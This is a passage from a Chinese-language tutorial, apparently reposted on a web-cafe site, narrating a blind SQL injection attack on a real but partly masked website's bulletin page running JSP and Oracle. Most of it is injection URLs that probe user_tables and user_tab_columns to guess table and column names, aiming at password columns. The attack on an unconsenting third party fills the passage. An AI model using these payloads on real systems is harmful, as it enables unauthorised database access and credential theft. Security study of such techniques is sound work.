西安网吧在线 - JSP+Oracle SQL Injection之旅

　　我们再来看看这个表的长度，确定一下范围才好猜，不然不知道要猜到什么时候才能结束：

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables where length(table_name)>8 and table_name like'%25PL%25') and '1'='1

　　没有正确返回。看来不会大于8了，那我们试试等于8吧：

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables where length(table_name)=8 and table_name like'%25PL%25') and '1'='1

　　Yeah!正常返回，我们确定表名长度是8了。大家如果自己在猜测的时候，也可以用< >等来缩小范围。下面我们继续用上面的语句来猜测表名，最后得出的表名为PLAN_TAB。

　　TIPS：这里可以用Like来猜表，比如：看看有没有什么ADMIN，USERS表什么的。

and 0<>(select count(*) from user_tables where table_name like '%25ADMIN%25') and '1'='1
　　and 0<>(select count(*) from user_tables where table_name like '%25USERS%25') and '1'='1

　　表名猜出来了，我们来检测一下：

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables where table_name='PLAN_TAB') and '1'='1

　　正常返回。我们辛苦总算没有白费，不过烟倒是牺牲了不少，不过革命尚未成功，同志仍需努力!继续猜列名：

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where table_name='PLAN_TAB' and column_name like '%25PASS%25') and '1'='1

　　试试有没有PASS(一些很容易想到的我都试了)这个字段，结果很失望，什么都没有。那有什么办法将它猜出来呢?看下面的方法。

　　看来这个表里没有什么敏感列名了，有点泄气。再去翻翻Oracle的书，突然想到可以直接查列名，汗!可能是以前学MSSQL、MYSQL的时候形成固定思维了，忘了Oracle是不一样的。那我们干脆来直接的

　　看看有没有敏感列名吧!.

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where column_name like '%25PASS%25') and '1'='1

　　直接来猜看看有没有PASS，和NAME这样的列名。经测试有LIKE ID/NAME/PASSWD这三个列名，但它们有可能不在同一个表里，那我就拿LIKE PASS这个来测试。先来看看有PASSWD这个列名对应的表名的长度：

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where column_name like '%25PASS%25' and length(table_name)=8) and '1'='1

JSP+Oracle SQL Injection之旅

Tags： JS 之旅